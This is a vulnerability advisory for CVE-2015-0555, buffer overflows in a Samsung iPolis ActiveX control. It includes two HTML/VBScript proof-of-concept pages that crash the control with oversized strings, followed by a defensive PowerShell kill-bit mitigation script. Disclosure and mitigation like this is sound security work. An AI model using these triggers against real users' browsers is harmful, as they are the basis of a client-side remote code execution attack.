CVE-2015-0555

Introduction
*************************************************************
There is a buffer overflow vulnerability which leads to remote code execution. The vulnerability is due to insufficient input validation in the ReadConfigValue and WriteConfigValue APIs of XnsSdkDeviceIpInstaller.ocx.

This is different from CVE-2014-3911: the affected version here is iPolis 1.12.2 (latest as of 12/12/2014), whereas CVE-2014-3911 relates to a different ActiveX control and an older iPolis version.

Discovery Method: Fuzzing

Exploiting: It is a client-side attack in which the attacker hosts a crafted HTML web page with a malicious payload and entices the victim to browse to the hosted page, compromising the victim.

Operating System: Windows 7 Ultimate N SP1
*************************************************************

Vulnerability 1:
Samsung_iPolis1.12.2_XnsSdkDeviceIpInstaller.ocx_ActiveX_ReadConfigValue_RemoteCodeExecution

****************** Proof of Concept (PoC) ******************
<html>
<head><title>Samsung iPolis 1.12.x XnsSdkDeviceIpInstaller.ocx ReadConfigValue() Remote Code Execution</title></head>
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'></object>
<script language='vbscript'>
' Descriptive metadata about the control; not used by the call below
targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx"
prototype = "Function ReadConfigValue ( ByVal szKey As String ) As String"
memberName = "ReadConfigValue"
progid = "XNSSDKDEVICELib.XnsSdkDevice"
argCount = 1

' 1044-character string passed as szKey
arg1=String(1044, "A")

target.ReadConfigValue arg1
</script>
</html>
*************************************************************

Vulnerability 2:
Samsung_iPolis1.12.2_XnsSdkDeviceIpInstaller.ocx_ActiveX_WriteConfigValue_RemoteCodeExecution

****************** Proof of Concept (PoC) ******************
<html>
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'></object>
<script language='vbscript'>
' Descriptive metadata about the control; not used by the call below
targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx"
prototype = "Function WriteConfigValue ( ByVal szKey As String , ByVal szValue As String ) As Long"
memberName = "WriteConfigValue"
progid = "XNSSDKDEVICELib.XnsSdkDevice"
argCount = 2

' 14356-character string passed as szKey; szValue is a short constant
arg1=String(14356, "A")
arg2="defaultV"

target.WriteConfigValue arg1 ,arg2
</script>
</html>
*************************************************************

CERT contacted Samsung, but there was no response from Samsung.

Refer to http://blog.disects.com for more details.

Best Regards,
Praveen Darshanam
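
Since the advisory reports no vendor response, one interim mitigation is to set the Internet Explorer kill bit for the control's CLSID so that pages cannot instantiate it. The script below is an added example, not part of the original advisory or any Samsung guidance; the CLSID is the one used in the PoCs above, the function name Set-KillBit is hypothetical, and it assumes an elevated PowerShell prompt.

```powershell
# Added example: set the IE ActiveX kill bit for the control named in the advisory.
# Assumption: run from an elevated PowerShell session (HKLM is written).
$Clsid   = '{D3B78638-78BA-4587-88FE-0537A0825A72}'   # CLSID from the advisory's PoC
$KillBit = 0x400                                        # kill bit in "Compatibility Flags"
$Value   = 'Compatibility Flags'

# 64-bit Windows keeps a separate registry view for 32-bit Internet Explorer.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Set-KillBit {
    param([string]$Root, [string]$Clsid)

    # The Wow6432Node view does not exist on 32-bit Windows; skip it there.
    if (-not (Test-Path -LiteralPath $Root)) { return }

    $key = Join-Path $Root $Clsid
    if (-not (Test-Path -LiteralPath $key)) {
        New-Item -Path $key -Force | Out-Null
    }

    # Preserve any flags already present and OR the kill bit into them.
    $current = (Get-ItemProperty -LiteralPath $key -Name $Value `
                    -ErrorAction SilentlyContinue).$Value
    if ($null -eq $current) { $current = 0 }
    New-ItemProperty -LiteralPath $key -Name $Value -PropertyType DWord `
        -Value ($current -bor $KillBit) -Force | Out-Null

    # Read the value back so the result reflects what is actually stored.
    $stored = (Get-ItemProperty -LiteralPath $key -Name $Value).$Value
    [pscustomobject]@{
        Key        = $key
        Flags      = '0x{0:X8}' -f $stored
        KillBitSet = [bool]($stored -band $KillBit)
    }
}

$Roots | ForEach-Object { Set-KillBit -Root $_ -Clsid $Clsid } | Format-List
```

The kill bit only stops Internet Explorer and other hosts that honor it from loading the control; it does not fix the overflow in the OCX itself.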